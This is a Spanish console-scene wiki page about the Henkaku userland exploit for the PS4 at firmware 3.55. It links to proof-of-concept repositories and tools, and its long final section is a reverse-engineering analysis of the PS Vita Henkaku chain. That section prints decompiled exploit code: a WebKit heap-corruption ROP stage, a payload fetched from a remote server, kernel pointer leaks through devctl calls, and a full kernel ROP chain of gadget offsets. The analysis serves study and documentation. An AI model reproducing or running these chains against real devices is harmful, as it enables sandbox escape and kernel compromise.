Henkaku PlayStation 4

MUY IMPORTANTE Siempre que se edite el WIKI para poner más secciones, dejar siempre "Ingeniería inversa a HenKaKu" de ultima, debido a su gran tamaño.


Si se usa esto, por ahora hay 0 brickeos y seguramente no los haya al ser UserLand, pero ni EOL, ni su staff ni yo KirtashTheShek nos hacemos responsables por cualquier daño que pueda sufrir tu consola.

WIKI by KirtashTheShek // Agosto 2016

HILO Henkaku by Toni___18 // Agosto 2016

Contenido

FW de Juegos y PSProxy

Juegos: http://www.elotrolado.net/hilo_ho-firmwares-requeridos-de-juegos_2203180#p1742720621

PSProxy: (Por ahora) Muerto en combate.

Henkaku para novatos

Esta es una guia, para no entorpecer el hilo.

Es necesario 3.55 3.50 3.15 para funcionar.

Henkaku a día de hoy (28/08/2016) es un exploit, de modo usuario, dicho claramente, puede hacer:

-Cargar emuladores.

-Cargar aplicaciones homebrew.

El unico requisito, es que estas aplicaciones, no necesiten modo kernel.

Por ahora, aun no hay ningun emu, pero no tardara, el exploit ya esta aqui, y si sigues el hilo, veras que cada poco tiempo sale un nuevo avance, las aplicaciones no tardaran, solo queda que alguien los portee a PS4.

Por ahora henkaku, -aunque todo sale públicamente- está orientado a desarrolladores y Sceners, ya que por ahora solo es un PoC Se pueden hacer dumps de los módulos, y etc...


Se recomienda encarecidamente no actualizar.

Si queréis saber más, leer el resto del wiki.

Fuentes usadas

Psxhax.com

Wololo.net

Elotrolado.net

GitHub.com


Mejores páginas para seguir los avances de la scene

Aqui en EOL:

http://www.elotrolado.net/hilo_scene-henkaku-portado-a-ps4_2182892

http://www.elotrolado.net/hilo_scene-liberan-el-exploit-dlclose-para-correr-linux-en-la-ps4_2163276

PSXHAX

Wololo.net

IMPORTANTE Wololo, hay que ir a la edición inglesa, la española está descontinuada.

¿Como empezó Henkaku?

Henkaku es un exploit de modo kernel para vita, desarrollado por YifanLu.

El día 6 de agosto, el developer @Fire30_ le manda un Tweet a la conocida página wololo, con un enlace a su Github

Donde se encuentra el PoC (también llamado Prueba de Concepto).

En vita, como se dice arriba es de modo Kernel, pero en PS4 hasta que se descubra algo es de UserLand.


¿Cómo ejecutar el exploit?

Hay 3 opciones.

Desde el tuto de GitHub (en inglés): https://github.com/Fire30/PS4-3.55-Code-Execution-PoC

Desde el Server del compañero @trigui : psxserver.com

Desde el playground de 3.55: https://github.com/Cryptogenic/PS4-Playground-3.55 V1.0 22/6/16

IMPORTANTE  Actualización: este último ya tiene sucesor, ver aquí: https://www.psxhax.com/threads/ps4console-by-cryptogenic-ps4-playground-3-55-successor.686/

Ejecutar el sistema de PS4 (OrbisOS)

Un user de la conocida página wololo ha publicado esto para hacer funcionar OrbisOS en PC.

Herramientas PS4

Dumpear los procesos de memoria --> Servidor de trigui o Aquí

PS4Tools by Keyaku: Diferentes herramientas para PS4 --> Aquí o Aquí

Librerías PS4 --> GitHub

Explorador de archivos (3.55) by MrV1rus --> Aquí

Ingeniería inversa a Henkaku

MUY IMPORTANTE Siempre que se edite el WIKI para poner más secciones, dejar siempre está de ultima, debido a su gran tamaño.

Hecho por: HexKiz

Parte 1

- Stage 1 (browser exploit): Visiting http://henkaku.xyz and pressing the "Install" button results in a server side useragent check. If the browser's useragent matches the one of a PS Vita/PSTV on the latest firmware version (3.60), the user is redirected to http://go.henkaku.xyz and an exploit is deployed. This exploit re-uses elements from the older public exploits (heap spraying method, sort() bug, scrollLeft attribute manipulation) and pairs them with a new heap corruption technique. Team molecule renamed variables and methods to provide a simple obfuscation layer on the HTML code.

You can find the partially reversed code (focusing on the most crucial portions) here: http://pastebin.com/bYA4xGaQ

Similarly to older exploits, this allows to corrupt an object's vtable and achieve ROP inside the SceWebkit module. Offsets for libraries and relevant ROP gadgets are fetched from a javascript file (http://go.henkaku.xyz/payload.js) during the last stage of the exploit. Team molecule implemented a dynamic method to relocate gadgets and functions' offsets for each module after their base addresses' are found (by looking at SceWebkit's import stubs).

- Stage 2 (ROP payload 1): At this stage, the browser exploit has layed out the memory space to start the first ROP payload which is reconstructed from the payload.js file. The payload.js file contains two arrays, one containing the payload's binary data and another containing the relocation type for each word. By crossing this information the exploit reads the payload and relocates all code offsets to their target module's address space by adding the module's base address to them: Relocation type 0 -> Plain data stored inside the ROP space itself. No relocation needed. Relocation type 1 -> Offset inside the ROP payload's stack. Relocation type 2 -> Offset inside the SceWebkit module. Relocation type 3 -> Offset inside the SceLibKernel module. Relocation type 4 -> Offset inside the SceLibc module. Relocation type 5 -> Offset inside the SceLibHttp module. Relocation type 6 -> Offset inside the SceNet(?) module. Relocation type 7 -> Offset inside the SceDriverUser(?) module.

The reconstructed payload can be find here: https://www.sendspace.com/file/mwpeut And an analysis of the payload's binary data can be found here: http://pastebin.com/gxc0cX1i

This payload is responsible for taking care of a few things like: // Do stuff ...

// Create a new thread for the second payload int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);

// Do stuff ...

// Construct the arguments for fetching the second payload strcpy(stack_base + 0x000000BC, "http://go.henkaku.xyz/x"); snprintf(stack_base + 0x000002C4, 0x00000100, "?a1=%x", stack_base); strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); snprintf(stack_base + 0x000002C4, 0x00000100, "&a2=%x&a3=%x&a4=%x&", SceWebkit_base, SceLibKernel_base, SceLibc_base); strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); snprintf(stack_base + 0x000002C4, 0x00000100, "&a5=%x&a6=%x&a7=%x&", SceLibHttp_base, SceNet_base, SceDriverUser_base); strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);

// Do stuff ...

// Send HTTP requests to fetch the second payload SceLibHttp_92fd(0x00010000); int http_buf = SceLibHttp_947b("ldr", 0x00000002, 0x00000001); SceLibHttp_950b(http_buf, stack_base + 0x000000BC, 0x00000000); int http_req = SceLibHttp_95ff(http_buf, 0x00000000, stack_base + 0x000000BC); SceLibHttp_9935(http_req, 0x00000000, 0x00000000); SceLibHttp_9983(http_req);

// Do stuff ...

After the first payload is done, an HTTP request is sent to the server using the following template: http://go.henkaku.xyz/x?a1=stack_base&a ... user_base&

Example: http://go.henkaku.xyz/x?a1=89f02000&a2= ... =e0047bf0&

The "x" script on the server side collects the base addresses for each module and generates a second payload to be run on the Vita.

- Stage 3 (ROP payload 2): The second payload is composed by another ROP chain and obfuscated ARM code. A preliminary analysis of this payload reveals a few interesting things: strcpy(stack_base + 0x000086B4, "sdstor0:"); strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");

// Do stuff ...

strcpy(stack_base + 0x000086E4, "molecule0:");

SceLibKernel_a4ad("molecule0:"); SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);

// Do stuff ...

int thread1_id = sceKernelCreateThread("pln", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x000003FF, 0x00000000);

SceLibKernel_a791(thread1_id, 0x7C);

// Do stuff ...

int thread2_id = sceKernelCreateThread("mhm", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

// Do stuff ...

SceNet_27E1("x", 0x00000002, 0x00000001); SceNet_27E1("x", 0x00000002, 0x00000001); SceNet_27E1("x", 0x00000002, 0x00000001); SceNet_27E1("x", 0x00000002, 0x00000001); SceNet_27E1("x", 0x00000002, 0x00000001);

// Do stuff ...

SceNet_27E1("sss", 0x00000002, 0x00000001); SceNet_27E1("tst", 0x00000002, 0x00000007); SceNet_27E1("tmp", 0x00000002, 0x00000001);

// Do stuff ...


To be continued... ~ H.

Parte 2

- Stage 3 (ROP payload 2): The second payload is composed by another ROP chain and data. It creates two userland threads (each one with it's own ROP chain), that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).

// Copy SD card device path and param strcpy(x_stack + 0x000086B4, "sdstor0:"); strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");

// Clear devctl 0x05 outbuf // From x_stack + 0x00006F34 to x_stack + 0x00007334 memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);

// Copy dummy device path strcpy(x_stack + 0x000086E4, "molecule0:");

// Mount path? sceLibKernel_A4AD("molecule0:");

// Send command 0x05 to "sdstor0:" sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

// Store leaked kernel pointer 1 // Comes from devctl_outbuf + 0x3D4 0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9

// Create "pln" thread // "pln" == "pointer leak n"? // Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC} int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

// Store "pln" thread's ID 0x00(x_stack + 0x00008E94) = thread_id

// Store SceKernelThreadInfo size 0x00(x_stack + 0x0000862C) = 0x7C

// Get thread info structure sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

// Save pln_threadinfo.stack + 0x00001000 0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000

// Stack parameters for "pln" ROP chain 0x00(x_stack + 0x00008954) = 0x00000014 0x00(x_stack + 0x00008958) = x_stack + 0x00006F34 0x00(x_stack + 0x0000895C) = 0x000003FF

// Stack parameters for "pln" ROP chain 0x00(x_stack + 0x0000896C) = 0x00000400 0x00(x_stack + 0x00008970) = 0x00000000 0x00(x_stack + 0x00008974) = 0x00000000

// Setup "pln" ROP chain 0x00(x_stack + 0x00008708) = 0x008DD9B5 0x00(x_stack + 0x0000870C) = 0x000086E4 0x00(x_stack + 0x00008710) = 0x00000000 0x00(x_stack + 0x00008714) = 0x00000000 0x00(x_stack + 0x00008718) = 0x00000000 0x00(x_stack + 0x0000871C) = 0x0000A4AD 0x00(x_stack + 0x00008720) = 0x00000000 0x00(x_stack + 0x00008724) = 0x000FCDBB 0x00(x_stack + 0x00008728) = 0x00000000 0x00(x_stack + 0x0000872C) = 0x008DD9B5 0x00(x_stack + 0x00008730) = 0x000086B4 0x00(x_stack + 0x00008734) = 0x00000005 0x00(x_stack + 0x00008738) = 0x000086CC 0x00(x_stack + 0x0000873C) = 0x00008954 0x00(x_stack + 0x00008740) = 0x0000690C 0x00(x_stack + 0x00008744) = 0x00000000 0x00(x_stack + 0x00008748) = 0x000FCDBB 0x00(x_stack + 0x0000874C) = 0x00000000 0x00(x_stack + 0x00008750) = 0x008DD9B5 0x00(x_stack + 0x00008754) = 0x000F4240 0x00(x_stack + 0x00008758) = 0x00000000 0x00(x_stack + 0x0000875C) = 0x00000000 0x00(x_stack + 0x00008760) = 0x00000000 0x00(x_stack + 0x00008764) = 0x00018544 0x00(x_stack + 0x00008768) = 0x00000000 0x00(x_stack + 0x0000876C) = 0x000FCDBB 0x00(x_stack + 0x00008770) = 0x00000000 0x00(x_stack + 0x00008774) = 0x008DD9B5 0x00(x_stack + 0x00008778) = 0x000086B4 0x00(x_stack + 0x0000877C) = 0x00000005 0x00(x_stack + 0x00008780) = 0x00007444 0x00(x_stack + 0x00008784) = 0x0000896C 0x00(x_stack + 0x00008788) = 0x0000690C 0x00(x_stack + 0x0000878C) = 0x00000000 0x00(x_stack + 0x00008790) = 0x000FCDBB 0x00(x_stack + 0x00008794) = 0x00000000 0x00(x_stack + 0x00008798) = 0x00000519

/* "pln" ROP

// Mount path? sceLibKernel_A4AD("molecule0:");

// Send devctl 0x05 sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

// Delay for a while sceKernelDelayThread(1000000);

// Send devctl 0x05 again using // input buffer from x_stack + 0x00007444 to x_stack + 0x00007844 sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);

// Deadlock sceWebkit_519();

  • /

// Copy "pln" ROP chain into "pln" thread's stack memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);

// Set stack pointer 0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0

// Set PC 0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC}

// Start "pln" thread // Thread arguments are loaded into R1 and the gadget // at the thread's entrypoint then loads register values // from it, overwritting SP and PC and triggering the // ROP chain sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

// Delay for a while sceKernelDelayThread(100000);

// Store leaked kernel pointer 2 // Comes from devctl_outbuf + 0x3C4 0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544

// Setup pointer to leaked address in kernel module 1 0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460

// Setup pointer to leaked address in kernel module 2 0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300

// Setup kernel mode ROP chain 0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031 0x00(x_stack + 0x00008A90) = 0x08106803 0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1 0x00(x_stack + 0x00008A98) = 0x00000038 0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571 0x00(x_stack + 0x00008AAC) = 0x00000000 0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43 0x00(x_stack + 0x00008AB4) = 0x00000000 0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D 0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73 0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031 0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913 0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523 0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3 0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067 0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F 0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713 0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D 0x00(x_stack + 0x00008AF0) = 0x00000000 0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603 0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17 0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031 0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913 0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61 0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB 0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571 0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61 0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1 0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411 0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1 0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9 0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411 0x00(x_stack + 0x00008B48) = 0x00000010 0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11 0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3 0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1 0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5 0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB 0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399 0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399 0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F 0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399 0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913 0x00(x_stack + 0x00008B8C) = 0x00000000 0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861 0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D 0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399 0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399 0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D 0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3 0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF 0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1 0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9 0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347 0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9 0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347 0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B 0x00(x_stack + 0x00008C04) = 0x00000000 0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95 0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93 0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411 0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7 0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3 0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411 0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5 0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B 0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5 0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49 0x00(x_stack + 0x00008C44) = 0xFFFFFEB0 0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B 0x00(x_stack + 0x00008C5C) = 0x00000040 0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49 0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B 0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B 0x00(x_stack + 0x00008C64) = 0x00000040 0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB 0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853 0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB 0x00(x_stack + 0x00008C80) = 0x00000038 0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB 0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1 0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B 0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD 0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1 0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1 0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117 0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399 0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F 0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0 0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B 0x00(x_stack + 0x00008CC0) = 0x00000040 0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49 0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73 0x00(x_stack + 0x00008CD0) = 0x00000000 0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD 0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9 0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1 0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117 0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1 0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067 0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47 0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9 0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33 0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB 0x00(x_stack + 0x00008D14) = 0x00000000 0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D 0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73 0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B 0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853 0x00(x_stack + 0x00008D28) = 0xFFFFFFFF 0x00(x_stack + 0x00008D2C) = 0x08106803 0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3 0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433 0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3 0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3 0x00(x_stack + 0x00008D44) = 0x00000000 0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D 0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000 0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853 0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F 0x00(x_stack + 0x00008D58) = 0x00000000 0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347 0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9 0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605 0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD 0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB 0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853 0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F

// Overwrite specific NULLs in the ROP chain 0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC) 0x00(x_stack + 0x00008B48) = 0x00000090 0x00(x_stack + 0x00008CC0) = 0x00000240 0x00(x_stack + 0x00008D58) = 0x00000200 0x00(x_stack + 0x00008D14) = 0x00008FC0

// Copy kernel ROP chain memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);

// Copy the first 0x400 bytes of "obfuscated" data // and append them at the bottom of the ROP chain memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);

// Set kernel thread SP, PC, UNK 0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC 0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004 0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347

